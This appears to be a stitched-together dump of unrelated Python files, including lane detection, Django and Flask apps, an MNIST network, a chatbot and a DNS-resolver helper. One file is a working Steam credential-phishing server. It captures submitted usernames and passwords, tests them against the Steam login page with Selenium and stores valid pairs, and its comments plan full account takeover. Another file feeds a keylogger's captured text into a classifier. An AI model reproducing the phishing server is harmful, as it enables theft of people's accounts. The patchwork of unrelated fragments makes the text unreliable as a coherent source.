blur = cv2.GaussianBlur(gray,(5,5),0)
cany = cv2.Canny(blur,50,150)
return cany
def display_line(image,lines):
line_image = np.zeros_like(image)
if lines is not None:
for line in lines:
x1,y1,x2,y2 = line.reshape(4)
cv2.line(line_image, (x1,y1), (x2,y2), (255,0,0), 10)
return line_image
def region_of_interest(image):
height = image.shape[0]
tringale = np.array([
[(200, height),(1100, height),(550, 250)]
])
mask = np.zeros_like(image)
cv2.fillPoly(mask, tringale, 210)
masked_image = cv2.bitwise_and(image,mask)
return masked_image
image = cv2.imread("test_image.jpg")
lane_image = np.copy(image)
cany_image = canny(lane_image)
croped_image = region_of_interest(cany_image)
line = cv2.HoughLinesP(croped_image, 2, np.pi/180, 100, np.array([]), minLineLength=40, maxLineGap =5)
avarage_line = avarage_line_intercept(lane_image,line)
line_image = display_line(lane_image,avarage_line)
combo_image = cv2.addWeighted(lane_image, 0.8, line_image, 1, 1)
cv2.imshow("results",combo_image)
cv2.waitKey(0) |
from django.contrib import admin
# Register your models here.
from django.contrib.auth.admin import UserAdmin
from .forms import CustomUserCreationForm, CustomUserChangeForm
from .models import CustomUser
class CustomUserAdmin (UserAdmin):
add_form =CustomUserCreationForm
form =CustomUserChangeForm
list_display = [ 'email' , 'username' , 'age' ]
model = CustomUser
admin . site . register(CustomUser, CustomUserAdmin) |
import json
from app import db
class Game(db.Model):
__tablename__ = 'games'
id = db.Column(db.String, primary_key=True)
state = db.Column(db.Text)
song = db.Column(db.Text)
scores = db.Column(db.Text)
difficulty = db.Column(db.Text)
def __init__(self, chatId, state, song=None, scores=json.dumps(dict()), difficulty=50):
self.id = chatId
self.state = state
self.song = song
self.scores = scores
self.difficulty = difficulty
def __repr__(self):
return '<Game %r>' % self.state
|
from app import db
from app.models import User, Post
def cleanAll():
users = User.query.all()
deletedUsers = 0
deletedPosts = 0
for u in users:
db.session.delete(u)
deletedUsers = deletedUsers + 1
posts = Post.query.all()
for p in posts:
db.session.delete(p)
deletedPosts = deletedPosts + 1
db.session.commit()
print('\ndeleted users={} posts={}'.format(deletedUsers, deletedPosts))
cleanAll()
u = User(username='john', email='john@example.com')
db.session.add(u)
u = User(username='susan', email='susan@example.com')
db.session.add(u)
db.session.commit()
print('\nusers')
users = User.query.all()
for u in users:
print(u.id, u.username)
u = users[0]
u = User.query.get(u.id)
p = Post(body='my first post!', author=u)
db.session.add(p)
db.session.commit()
posts = u.posts.all()
print('\nall posts')
print(posts)
u = users[0]
print('\nposts of user ' + u.username)
print(u.posts.all())
u = users[1]
print('\nposts of user ' + u.username)
print(u.posts.all())
print('\nall posts')
posts = Post.query.all()
for p in posts:
print(p.id, p.author.username, p.body)
print('\nusers')
users = User.query.order_by(User.username.desc()).all()
for u in users:
print(u.id, u.username)
cleanAll() |
print "hallo"
print "test" |
from fake_useragent import UserAgent
import json
from . import module_helpers
class DnsServers(module_helpers.RequestsHelpers):
"""
A set of functions to find resolvers to use
of high quality.
"""
def __init__(self):
"""
Init class structure.
"""
module_helpers.RequestsHelpers.__init__(self)
self.ua = UserAgent()
self.nameservers = []
self.nameserver_ips = []
def populate_servers(self):
"""
Populate server list.
:return: NONE
"""
data, status = self.request_json(
'https://public-dns.info/nameserver/us.json')
if status:
data = json.loads(data)
for d in data:
self.nameservers.append(d)
self.clean_servers()
def populate_config(self, json_config):
"""
Populate the json config file at runtime with
public dns servers.
:param json_config: start JSON config
:return: json_config: final JSON config
"""
json_config['resolvers'] = self.nameserver_ips[0:10]
return json_config
def clean_servers(self):
"""
Sort name servers.
:return: NONE
"""
for i in self.nameservers:
# check for 100% reliability
if i['reliability'] == 1:
self.nameserver_ips.append(i['ip'])
def count_resolvers(self):
"""
Count resolvers.
:return: INT nameserver list count
"""
return len(self.nameserver_ips)
|
from flask import Flask, render_template
app = Flask(__name__)
@app.route('/')
def hello_world():
return 'Hello World!'
@app.route('/recipes/')
def recipe_list():
return 'list goes here'
#@app.route('/recipes/<recipe>')
@app.route('/recipes/recipe')
def display_recipe():
#return 'Recipe %d', recipe
return render_template('recipes/recipe.html')
if __name__ == '__main__':
app.run()
|
from django.db import models
class User(models.Model):
ID = models.AutoField(primary_key = True)
Name = models.CharField(max_length = 30)
OpenID = models.CharField(max_length = 100, unique = True)
Session = models.CharField(max_length = 100)
class Education(models.Model):
EDUCATION_TYPE = (
('U','Undergraduate'),
('M','Master'),
('D','Doctor'),
)
ID = models.AutoField(primary_key = True)
Student = models.ForeignKey(User, on_delete = models.CASCADE, related_name = "Education")
StartYear = models.IntegerField()
Department = models.CharField(max_length = 30)
Type = models.CharField(max_length = 30, choices = EDUCATION_TYPE)
class Activity(models.Model):
STATUS_TYPE_ACTIVITY = (
(0,'Except'),
(1,'BeforeSignup'),
(2,'Signup'),
(3,'SignupPaused'),
(4,'SignupStopped'),
(5,'Signin'),
(6,'SigninPaused'),
(7,'Finish'),
)
ID = models.AutoField(primary_key = True)
Name = models.CharField(max_length = 100)
Place = models.CharField(max_length = 100)
StartTime = models.IntegerField()
EndTime = models.IntegerField()
SignUpStartTime = models.IntegerField()
SignUpEndTime = models.IntegerField()
MinUser = models.IntegerField()
CurrentUser = models.IntegerField()
MaxUser = models.IntegerField()
Type = models.CharField(max_length = 100)
Status = models.IntegerField(choices = STATUS_TYPE_ACTIVITY)
CanBeSearched = models.BooleanField()
#todo:rule
class JoinInformation(models.Model):
STATUS_TYPE_JOIN = (
(0, "WaitValidate"),
(1, "Joined"),
(2, "NotChecked"),
(3, "Checked"),
(4, "Finished"),
(5, "Missed"),
)
ROLE_TYPE_JOIN = (
(0, "Common"),
(1, "Manager"),
(2, "Creator")
)
ID = models.AutoField(primary_key = True)
JoinTime = models.IntegerField()
CheckTime = models.IntegerField()
Status = models.IntegerField(choices = STATUS_TYPE_JOIN)
Role = models.IntegerField(choices = ROLE_TYPE_JOIN)
UserId = models.ForeignKey(User, on_delete = models.CASCADE, related_name = "History")
ActivityId = models.ForeignKey(Activity, on_delete = models.CASCADE, related_name = "History")
#todo:付款等 |
import threading
from sklearn.externals import joblib
from tag_from_text_model import LogisticRegressionIntentClassifier
from logger import Logger
class TextClassifier:
def __init__(self, model_filename='model.joblib'):
self.key_logger = Logger(1920, 1080)
self.classifier = LogisticRegressionIntentClassifier.load(model_filename)
def run(self):
self.key_logger.run()
def get_text_tags(self):
text_tags = self.classifier.predict([self.key_logger.get_key_info().text])[0]
types = ["document", "code", "message", "_empty__"]
res = {key: 0 for key in types}
res[text_tags] = 1
return res
import time
if __name__ == '__main__':
clf = TextClassifier()
for i in range(10):
time.sleep(10)
print(clf.get_text_tags())
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.3 on 2016-07-27 20:31
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('siwedeeapp', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='CATALUMNO',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('MATRICULA', models.IntegerField()),
('IDPROCESO', models.IntegerField(null=True)),
('IDCARRERA', models.IntegerField(null=True)),
('IDEMPRESA', models.IntegerField(null=True)),
('ACTIVO', models.BooleanField()),
],
),
migrations.CreateModel(
name='ID_ALUMNO',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('idalumno', models.IntegerField()),
],
),
migrations.AddField(
model_name='catalumno',
name='IDALUMNO',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='siwedeeapp.ID_ALUMNO'),
),
]
|
import numpy as np
import pickle
import copy
import matplotlib.pyplot as plt
import statistics
from os import listdir
from PIL import Image
config = {}
config['layer_specs'] = [784,50,10] # The length of list denotes number of hidden layers; each element denotes number of neurons in that layer; first element is the size of input layer, last element is the size of output layer.
config['activation'] = 'tanh' # Takes values 'sigmoid', 'tanh' or 'ReLU'; denotes activation function for hidden layers
config['batch_size'] = 1000 # Number of training samples per batch to be passed to network
config['epochs'] = 200 # Number of epochs to train the model
config['early_stop'] = False# Implement early stopping or not
config['early_stop_epoch'] = 5 # Number of epochs for which validation loss increases to be counted as overfitting
config['L2_penalty'] = 0 # Regularization constant
config['momentum'] = False # Denotes if momentum is to be applied or not
config['momentum_gamma'] = 0.7 # Denotes the constant 'gamma' in momentum expression
config['learning_rate'] = 0.001 # Learning rate of gradient descent algorithm
def softmax(x):
"""
Write the code for softmax activation function that takes in a numpy array and returns a numpy array.
"""
return np.exp(x) / np.array([np.sum(np.exp(x), axis=1)]).T
def oneHot(Y_oh, max_val):
""" Computes onehot.
Input: Y_oh: list of number
max_val: The max one-hot size
Returns: 2D list correspind to the each label's one hot representation
"""
result_oh = []
for i in range(len(Y_oh)):
onehot = [0] * (int(max_val)+1)
onehot[int(Y_oh[i])] = 1
result_oh.append(onehot)
return np.array(result_oh)
def load_data(fname):
"""
Write code to read the data and return it as 2 numpy arrays.
Make sure to convert labels to one hot encoded format.
fname : folder name
"""
fname = 'data/' + fname
training_data = pickle.load(open(fname, 'rb'), encoding='latin1')
images = normalize_data(training_data[:,:784])
labels = oneHot(training_data[:,784],9)
print("Total number of images:", len(images), "and labels:", len(labels))
return images, labels
def normalize_data(img):
img = img.T
img = (img - img.min(axis=0)) * (1 / (img.max(axis=0) - img.min(axis=0)))
return img.T
class Activation:
def __init__(self, activation_type = "sigmoid"):
self.activation_type = activation_type
self.x = None # Save the input 'x' for sigmoid or tanh or ReLU to this variable since it will be used later for computing gradients.
def forward_pass(self, a):
if self.activation_type == "sigmoid":
return self.sigmoid(a)
elif self.activation_type == "tanh":
return self.tanh(a)
elif self.activation_type == "ReLU":
return self.ReLU(a)
def backward_pass(self, delta):
if self.activation_type == "sigmoid":
grad = self.grad_sigmoid()
elif self.activation_type == "tanh":
grad = self.grad_tanh()
elif self.activation_type == "ReLU":
grad = self.grad_ReLU()
return grad * delta
def sigmoid(self, x):
"""
Write the code for sigmoid activation function that takes in a numpy array and returns a numpy array.
"""
self.x = x
return 1. / (1. + np.exp(-x))
def tanh(self, x):
"""
Write the code for tanh activation function that takes in a numpy array and returns a numpy array.
"""
self.x = x
return (np.exp(x)-np.exp(-x))/(np.exp(x)+np.exp(-x))
def ReLU(self, x):
"""
Write the code for ReLU activation function that takes in a numpy array and returns a numpy array.
"""
self.x = x
return np.multiply(x,x > 0)
def grad_sigmoid(self):
"""
Write the code for gradient through sigmoid activation function that takes in a numpy array and returns a numpy array.
"""
grad = np.multiply(self.sigmoid(self.x), (1-self.sigmoid(self.x)))
return grad
def grad_tanh(self):
"""
Write the code for gradient through tanh activation function that takes in a numpy array and returns a numpy array.
"""
grad = 1-(self.tanh(self.x)**2)
return grad
def grad_ReLU(self):
"""
Write the code for gradient through ReLU activation function that takes in a numpy array and returns a numpy array.
"""
grad = np.ones(self.x.shape)
grad[(self.x < 0)] = 0
return grad
class Layer():
def __init__(self, in_units, out_units):
np.random.seed(42)
self.w = np.random.randn(in_units, out_units) # Weight matrix
self.b = np.zeros((1, out_units)).astype(np.float32) # Bias
self.x = None # Save the input to forward_pass in this
self.a = None # Save the output of forward pass in this (without activation)
self.d_x = None # Save the gradient w.r.t x in this
self.d_w = None # Save the gradient w.r.t w in this
self.d_b = None # Save the gradient w.r.t b in this
def forward_pass(self, x):
"""
Write the code for forward pass through a layer. Do not apply activation function here.
"""
self.x = x
self.a = self.x.dot(self.w)+self.b
return self.a
def backward_pass(self, delta):
"""
Write the code for backward pass. This takes in gradient from its next layer as input,
computes gradient for its weights and the delta to pass to its previous layers.
"""
self.d_x = delta.dot(self.w.T)
self.d_w = self.x.T.dot(delta)
self.d_b = delta.sum(axis=0)
return self.d_x
class Neuralnetwork():
def __init__(self, config):
self.layers = []
self.x = None # Save the input to forward_pass in this
self.y = None # Save the output vector of model in this
self.v = []
self.v_b = []
self.n_l = -1
self.targets = None # Save the targets in forward_pass in this variable
for i in range(len(config['layer_specs']) - 1):
self.layers.append( Layer(config['layer_specs'][i], config['layer_specs'][i+1]) )
self.v.append(self.layers[-1].w*0)
self.v_b.append(self.layers[-1].b*0)
if i < len(config['layer_specs']) - 2:
self.layers.append(Activation(config['activation']))
print(self.layers)
def forward_pass(self, x, targets=None):
"""
Write the code for forward pass through all layers of the model and return loss and predictions.
If targets == None, loss should be None. If not, then return the loss computed.
"""
self.x = x
self.targets = targets
layer_in = x;
for layer in self.layers:
layer_in = layer.forward_pass(layer_in)
self.y = softmax(layer_in)
if targets is not None:
loss = self.loss_func(self.y,targets)
else:
loss = None
return loss, self.y
def loss_func(self, logits, targets):
'''
find cross entropy loss between logits and targets
'''
m = np.array(logits).shape[0]
n = np.array(logits).shape[1]
#logits = np.array(logits, dtype=np.float)
#targets = targets[mask]
output = -(1.0 / (m * n)) * np.sum(np.multiply(targets, np.log(logits)))
return output
def backward_pass(self, return_flag=False):
'''
implement the backward pass for the whole network.
hint - use previously built functions.
'''
ly = 0
delta = (self.targets - self.y)
if return_flag:
for l in reversed(self.layers):
delta = l.backward_pass(delta)
if ly == self.n_l:
return delta
ly += 1
else:
for l in reversed(self.layers):
delta = l.backward_pass(delta)
def update_weight(self):
'''
implement the weight update for each layer
:return: none
'''
lr = config['learning_rate']
gamma = config['momentum_gamma']
m = config['momentum']
lam = config['L2_penalty']
i = 0
for l in self.layers:
if isinstance(l, Layer):
l.w = l.w + l.d_w*lr + self.v[i]*gamma*m + lam*l.w
l.b = l.b + l.d_b*lr + self.v_b[i]*gamma*m + lam*l.b
#l.b = l.b + l.d_w*lr
#print(i)
self.v[i] = self.v[i]*gamma*m + l.d_w*lr
self.v_b[i] = self.v_b[i]*gamma*m + l.d_b*lr#*(1-gamma)
i += 1
def trainer_check_gradient(model, X_train, y_train, flag = "input_to_hidden_w_1"):
"""
Write the code to train the network. Use values from config to set parameters
such as L2 penalty, number of epochs, momentum, etc.
"""
eps = 0.01
model_plus = copy.deepcopy(model)
model_minus = copy.deepcopy(model)
model_temp = copy.deepcopy(model)
batch_x = X_train[0:1, :]
batch_y = y_train[0:1, :]
[loss_train, _] = model_temp.forward_pass(batch_x, batch_y)
model_temp.backward_pass()
if flag is "input_to_hidden_w_1":
model_plus.layers[0].w[0,0] += eps
model_minus.layers[0].w[0,0] -= eps
bp_gradient = model_temp.layers[0].d_w[0,0]
if flag is "input_to_hidden_w_2":
model_plus.layers[0].w[1, 1] = model_plus.layers[0].w[1, 1]+eps
model_minus.layers[0].w[1, 1] = model_minus.layers[0].w[1, 1]-eps
bp_gradient = model_temp.layers[0].d_w[1, 1]
if flag is "hidden_to_output_w_1":
model_plus.layers[-1].w[1, 1] = model_plus.layers[-1].w[1, 1]+eps
model_minus.layers[-1].w[1, 1] = model_minus.layers[-1].w[1, 1]-eps
bp_gradient = model_temp.layers[-1].d_w[1, 1]
if flag is "hidden_to_output_w_2":
model_plus.layers[-1].w[0, 1] = model_plus.layers[-1].w[0, 1]+eps
model_minus.layers[-1].w[0, 1] = model_minus.layers[-1].w[0, 1]-eps
bp_gradient = model_temp.layers[-1].d_w[0, 1]
if flag is "hidden_b_1":
model_plus.layers[2].b[0][0] = model_plus.layers[2].b[0][0] + eps
model_minus.layers[2].b[0][0] = model_minus.layers[2].b[0][0] - eps
bp_gradient = model_temp.layers[2].d_b[0]
if flag is "output_b_1":
model_plus.layers[-1].b[0][0] = model_plus.layers[-1].b[0][0] + eps
model_minus.layers[-1].b[0][0] = model_minus.layers[-1].b[0][0] - eps
bp_gradient = model_temp.layers[-1].d_b[0]
bp_gradient = bp_gradient/10
[loss_train_minus, _] = model_minus.forward_pass(batch_x,batch_y)
[loss_train_plus, _] = model_plus.forward_pass(batch_x, batch_y)
cal_gradient = (loss_train_plus - loss_train_minus)/(2*eps)
print(flag + " " + str(abs(cal_gradient) - abs(bp_gradient)))
line = flag + " bp_gradient is " + str(bp_gradient) + " (E_plus-E_minus)/2e = "+\
str(cal_gradient)+ " Error of eps plus is "\
+ str(loss_train_plus) + " Error of eps minus is " + str(loss_train_minus)
print(line)
def trainer(model, X_train, y_train, X_valid, y_valid, config):
"""
Write the code to train the network. Use values from config to set parameters
such as L2 penalty, number of epochs, momentum, etc.
"""
loss_train_overall = []
loss_valid_overall = []
acc_train_overall = []
acc_valid_overall = []
loss_train_batch = []
#loss_valid_batch = []
acc_train_batch = []
#acc_valid_batch = []
loss_valid = float('inf')
num = 0
for i in range(config['epochs']):
for j in range(len(X_train)):
start = j*config['batch_size']
end = (j+1)*config['batch_size']
if start >= len(X_train):
break
batch_x = X_train[start:end,:]
batch_y = y_train[start:end,:]
[loss_train_temp, prediction] = model.forward_pass(batch_x, batch_y)
model.backward_pass()
model.update_weight()
[loss_train_mini, pred_t_mini] = model.forward_pass(batch_x, batch_y)
#[loss_valid_mini, pred_v_mini] = model.forward_pass(X_valid, y_valid)
acc_train_mini = accuracy(pred_t_mini, batch_y)
#acc_valid_mini = accuracy(pred_v_mini, y_valid)
loss_train_batch.append(loss_train_mini)
#loss_valid_batch.append(loss_valid_mini)
acc_train_batch.append(acc_train_mini)
#acc_valid_batch.append(acc_valid_mini)
[loss_valid_temp, pred_v] = model.forward_pass(X_valid, y_valid)
#[loss_train_temp, pred_t] = model.forward_pass(X_train, y_train)
loss_train_avg = statistics.mean(loss_train_batch)
#loss_valid_avg = statistics.mean(loss_valid_batch)
acc_train_avg = statistics.mean(acc_train_batch)
acc_valid_temp = accuracy(pred_v, y_valid)
loss_train_overall.append(loss_train_avg)
loss_valid_overall.append(loss_valid_temp)
acc_train_overall.append(acc_train_avg)
acc_valid_overall.append(acc_valid_temp)
if config['early_stop'] == True:
if loss_valid_temp <= loss_valid:
loss_valid = loss_valid_temp
num = 0
else:
num +=1
loss_valid = loss_valid_temp
if num > config['early_stop_epoch']:
line = "Early stop iteration " + str(i) + " training loss is " + str(loss_train_avg) + " validation loss " + str(loss_valid_temp)
line2 = "Training accuracy " + str(acc_train_avg) + " Validation accuracy " + str(acc_valid_temp)
print(line)
print(line2)
#display_loss(loss_train_overall,loss_valid_overall)
#display_accuracy(acc_train_overall, acc_valid_overall)
break
line = "Epoch " + str(i) + " training loss is " + str(loss_train_avg) + " validation loss " + str(loss_valid_temp)
print(line)
line_1 = "Training acc is " + str(acc_train_avg) + " Validation accuracy " + str(acc_valid_temp)
print(line_1)
display_loss(loss_train_overall, loss_valid_overall)
display_accuracy(acc_train_overall, acc_valid_overall)
def accuracy(pred, t):
return sum(pred.argmax(axis=1) == t.argmax(axis=1)) / pred.shape[0]
def test(model, X_test, y_test, config):
"""
Write code to run the model on the data passed as input and return accuracy.
"""
[_,prediction] = model.forward_pass(X_test)
return accuracy(prediction,y_test)
def display_loss(loss_train,loss_vali):
epc = list(range(len(loss_train)))
epc = [x + 1 for x in epc]
plt.plot(epc, loss_train, label='cross entropy loss_train')
plt.plot(epc, loss_vali, label='cross entropy loss_validation')
plt.title('Losses versus training epochs at learning rate ' + str(config['learning_rate']) +
' Momentum ' + str(config['momentum_gamma']) + ' L2 ' + str(config['L2_penalty']))
plt.xlabel('Number of epochs')
plt.ylabel('Loss over epochs')
plt.legend(bbox_to_anchor=(1, 1), loc='upper right', ncol=1)
plt.show()
def display_accuracy(acc_train,acc_vali):
epc = list(range(len(acc_train)))
epc = [x + 1 for x in epc]
plt.plot(epc, acc_train, label='acc of train')
plt.plot(epc, acc_vali, label='acc of validation')
plt.title('Accuracy versus training epochs at learning rate ' + str(config['learning_rate']) +
' Momentum ' + str(config['momentum_gamma']) + ' L2 ' + str(config['L2_penalty']))
plt.xlabel('Number of epochs')
plt.ylabel('Accuracy over epochs')
plt.legend(bbox_to_anchor=(1, 1), loc='upper right', ncol=1)
plt.show()
if __name__ == "__main__":
train_data_fname = 'MNIST_train.pkl'
valid_data_fname = 'MNIST_valid.pkl'
test_data_fname = 'MNIST_test.pkl'
### Train the network ###
model = Neuralnetwork(config)
X_train, y_train = load_data(train_data_fname)
X_valid, y_valid = load_data(valid_data_fname)
X_test, y_test = load_data(test_data_fname)
trainer_check_gradient(model, X_train, y_train, flag="input_to_hidden_w_1")
trainer_check_gradient(model, X_train, y_train, flag="input_to_hidden_w_2")
trainer_check_gradient(model, X_train, y_train, flag="hidden_to_output_w_1")
trainer_check_gradient(model, X_train, y_train, flag="hidden_to_output_w_2")
trainer_check_gradient(model, X_train, y_train, flag="hidden_b_1")
trainer_check_gradient(model, X_train, y_train, flag="output_b_1")
trainer(model, X_train, y_train, X_valid, y_valid, config)
test_acc = test(model, X_test, y_test, config)
print("test acc is " + str(test_acc))
|
# 使用 `ipython --matplotlib=qt` 启动 IPython console,避免输入 `plt.show()`
# 为了每次只显示一张图,在下面标记出来的3行处加断点,例如:
# >>> run -d -b23 visual_cnn.py
# ipdb> b 32
# ipdb> b 44
from keras.models import load_model
from keras.preprocessing import image
from keras import models
import numpy as np
import matplotlib.pyplot as plt
model = load_model('dogs_vs_cats/cats_and_dogs_small_2.h5')
model.summary()
img_path = 'dogs_vs_cats/test/cats/cat.11350.jpg'
img = image.load_img(img_path, target_size=(150, 150))
img_tensor = image.img_to_array(img)
img_tensor = np.expand_dims(img_tensor, axis=0)
img_tensor /= 255.
print(img_tensor.shape)
plt.imshow(img_tensor[0]) # add breakpoint add this line,原始图片
layer_outputs = [layer.output for layer in model.layers[:8]]
activation_model = models.Model(inputs=model.input, outputs=layer_outputs)
activations = activation_model.predict(img_tensor)
first_layer_activation = activations[0]
print(first_layer_activation.shape)
plt.matshow(first_layer_activation[0, :, :, 4], cmap='viridis') # add breakpoint add this line
plt.matshow(first_layer_activation[0, :, :, 7], cmap='viridis') # 第一层的两个特征,与原始图片相似度较高
layer_names = []
for layer in model.layers[:8]:
layer_names.append(layer.name)
# 每行16张图,包含16个featrue
images_per_row = 16
# 每个循环绘制一个layer中所有特征的激活图,共绘制8张图(8个layer)
for layer_name, layer_activation in zip(layer_names, activations):
n_features = layer_activation.shape[-1] # add breakpoint add this line
size = layer_activation.shape[1]
n_cols = n_features // images_per_row
# 生成整个空白画布(二维数组)
display_grid = np.zeros((size * n_cols, images_per_row * size))
# 填充一列特征图
for col in range(n_cols):
# 填充一行特征图
for row in range(images_per_row):
channel_image = layer_activation[0, :, :, col * images_per_row + row]
channel_image -= channel_image.mean()
channel_image /= channel_image.std()
channel_image *= 64
channel_image += 128
channel_image = np.clip(channel_image, 0, 255).astype('uint8')
# 填充一个特征图
display_grid[col * size : (col + 1) * size,
row * size : (row + 1) * size] = channel_image
scale = 1. / size
plt.figure(figsize=(scale * display_grid.shape[1],
scale * display_grid.shape[0]))
plt.title(layer_name)
plt.grid(False)
plt.imshow(display_grid, aspect='auto', cmap='viridis')
# 第1轮输出图中包含2行16列共32张图,与第0层 conv2d_5 的输出形状
# (None, 148, 148, 32) 中的32个 feature 吻合
# 后续循环中,每张图中包含的子图越来越多(feature 越来越多),
# 每个子图越来越小,例如 conv2d_6(第3层)每个子图 72 * 72,共 64 张图,
# conv2d_8(第7层)每个子图 15 * 15,共 128 张图
|
import os
import signal
import random
import time
import sys
import cgi
import io
addTo = False
listedOptions = False
addResp = False
improvingAI = False
inCrisis = False
whatMatter = False
sendLocation = False
storeStr = ""
storeFilepath = ""
userName = ""
namePrime = False
knowName = False
def printSys(inputTxt):
global inCrisis
global sendLocation
global whatMatter
global improvingAI
if inCrisis:
return crisis(inputTxt)
elif improvingAI:
return defProtocol(inputTxt)
elif improvingAI == False:
if inputTxt != "--q--":
return compTxt(inputTxt)
else:
return("Program quit ... all processes completed and saved")
def compTxt(inputTxt):
global addTo
global addResp
global listedOptions
global improvingAI
global whatMatter
global inCrisis
global namePrime
global userName
global knowName
newTxt = inputTxt.lower()
if "my name" in newTxt and len(userName) < 1:
namePrime = True
if ("i'm in trouble.".find(newTxt) != -1) or ("please help me.".find(newTxt) != -1) or ("i need help.".find(newTxt) != -1):
inCrisis = True
return crisis(inputTxt)
elif whatMatter == True:
return crisis(inputTxt)
else:
inputs = os.listdir("./static/Inputs")
for file in inputs:
filepath = "./static/Inputs/" + file
readInputFile = io.open(filepath, "r", encoding='cp1252')
r = readInputFile.readlines()
for line in r:
newLine = line.lower()
if namePrime:
userTxt = inputTxt.split(" ")
for word in userTxt:
if "what" in inputTxt.lower() and knowName == False:
namePrime = True
return "I don't know yet! What is your name?"
if word.lower() != "my" and word.lower() != "name" and word.lower() != "is" and knowName == False:
userName += word + " "
knowName = True
namePrime = False
if len(userName) > 1:
return "Nice to meet you, " + userName
elif newTxt in unicode(newLine) or unicode(newLine) in newTxt:
categs = os.listdir("./static/Outputs")
if file == "userNameQuery":
return "Your name is " + userName
elif file in categs:
if file != "farewell":
readOutputFile = open("./static/Outputs/" + file, "r").read().split("\n")
retStr = random.choice(readOutputFile)
if "your name" in retStr.lower():
namePrime = True
if retStr != "ignoreOutput":
return retStr
else:
addTo = True
addResp = False
listedOptions = True
improvingAI = True
return defProtocol(file)
addTo = True;
improvingAI = True;
return defProtocol(inputTxt)
def defProtocol(inputTxt):
global addTo
global listedOptions
global addResp
global storeStr
global storeFilepath
retStr = ""
if addTo == True:
improvingAI = True
if listedOptions == False:
storeStr = inputTxt
retStr += "I don't quite understand yet. How should I respond to this? <br> \n"
retStr += "\nTell me what category this belongs in! <br> \n"
categs = os.listdir("./static/Inputs")
categNames = list()
for file in categs:
retStr += os.path.basename(file) + "<br>\n"
categNames.append(os.path.basename(file))
listedOptions = True
addResp = False
elif addResp == True:
outputFile = open("./static/Outputs/" + storeFilepath , "a+")
if inputTxt != ">":
outputFile.write("\n" + inputTxt)
outputFile.close()
retStr += "Thank you for the input!"
listedOptions = False
addTo = False
addResp = False
improvingAI = False
else:
storeFilepath = inputTxt
inputFile = open("./static/Inputs/" + storeFilepath , "a+")
inputFile.write("\n"+ storeStr)
inputFile.close()
retStr += "Please let me know how I should respond to that."
addTo = True
addResp = True
listedOptions = True
improvingAI = True
return retStr
#printSys()
def crisis(inputTxt):
global inCrisis
global whatMatter
newTxt = inputTxt.lower()
#This is used to get the user location
#ipaddress = getIPaddress()
#setPlace = ipaddress
if whatMatter == False:
whatMatter = True
return "Please tell me what is the issue"
elif whatMatter == True:
inCrisis = False
whatMatter = False
if "no issue" in newTxt or "nothing" in newTxt:
return "Gotcha, let me know if you need me for something else"
elif "assault" in newTxt:
return 'Here are some locations near you that can help with assault:<br>\
<a href="http://www1.nyc.gov/site/nypd/bureaus/patrol/precincts/5th-precinct.page">5th Precinct - 19 Elizabeth St</a><br>\
<a href="http://www1.nyc.gov/site/nypd/bureaus/patrol/precincts/1st-precinct.page">1st Precinct - 16 Ericsson Pl</a><br>\
<a href="http://www1.nyc.gov/site/nypd/bureaus/patrol/precincts/9th-precinct.page">9th Precinct - 321 E 5th St</a>'
elif "fire" in newTxt:
return "Here are the locations of the nearest fire departments:<br>\
Ladder 8 - 14 N Moore St<br>\
Battalion 1 - 100 Duane St<br>\
Battalion 2 - 363 Broome St<br>"
elif "sick" in newTxt:
return 'Here are the locations of the nearest medical care facilities:<br>\
<a href="https://www.nyp.org/lowermanhattan">New York Presbytarian Hospital - 170 William St</a><br>\
<a href="https://www.nychealthandhospitals.org/health_care/?doctor=&specialty=&filter_location=39346&condition=1">NYC Health and Hospitals - 227 Madison St</a><br>\
<a href="https://nyulangone.org/locations/nyu-langone-medical-associates-canal-street">NYU Langone - 196 Canal St</a>'
'''def getIPaddress():
#The ip address of Gekko
parameters = "103.201.231.145"
#Use the place API for google to get nearlocation
response = requests.get("https://maps.googleapis.com/maps/api/place/findplacefromtext/output?input=parameters")
parameters = response.getLocation()
return "geoLocation"'''
|
import socketserver
import http.server
import logging
import cgi
from selenium import webdriver
PORT = 80
driver = webdriver.Chrome("chromedriver.exe")
class ServerHandler(http.server.SimpleHTTPRequestHandler):
def do_GET(self):
logging.error(self.headers)
http.server.SimpleHTTPRequestHandler.do_GET(self)
def do_POST(self):
logging.error(self.headers)
form = cgi.FieldStorage(
fp=self.rfile,
headers=self.headers,
environ={'REQUEST_METHOD':'POST',
'CONTENT_TYPE':self.headers['Content-Type'],
})
for item in form.list:
logging.error(item)
http.server.SimpleHTTPRequestHandler.do_GET(self)
#with open("data.txt", "w") as file:
# for key in form.keys():
# file.write(str(form.getvalue(str(key))) + ",")
# Try login
usrnme = str(form.getvalue("username"))
passwd = str(form.getvalue("password"))
print("Username:", usrnme, "Password:", passwd)
driver.get("https://steamcommunity.com/login/")
script_1 = open("scripts/login_1.js", "r").read().replace("{usrnme}", usrnme).replace("{passwd}", passwd)
error = driver.execute_script("return " + script_1)
if (error == False):
pr_file = open("data.txt", "r").read()
with open("data.txt", "w") as file:
file.write(pr_file)
for key in form.keys():
file.write(str(form.getvalue(str(key))) + ",")
#else:
#if user has steam guard
# ask user for Steam guard code
Handler = ServerHandler
httpd = socketserver.TCPServer(("", PORT), Handler)
print("serving at port", PORT)
httpd.serve_forever()
#recieve form post data, as in memory
#open selenium, try login
# if username and password correct, ask for Steam guard code
# if login successful
# change email address, change password, remove steam guard, add account to group.
# else
# display incorrect username/password error to user, ask them to login again.
|
from django.shortcuts import render, get_object_or_404, redirect
from .models import blog
from django.utils import timezone
# Create your views here.
def home(request):
blogs = blog.objects.filter(updated_at__lte=timezone.datetime.now()).order_by("-updated_at")
return render(request, 'home.html', {'blogs':blogs})
def detail(request, blog_id):
blogs = get_object_or_404(blog, pk=blog_id)
return render(request, 'detail.html', {'blogs':blogs})
def write(request):
return render(request, 'write.html')
def create(request):
blogs = blog()
blogs.title = request.GET["title"]
blogs.body = request.GET["body"]
blogs.created_at = timezone.datetime.now()
blogs.updated_at = timezone.datetime.now()
blogs.save()
return redirect("/")
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# py_squirrel.py
#
# Copyright 2012 Wolf Halton <wolf@sourcefreedom.com>
#
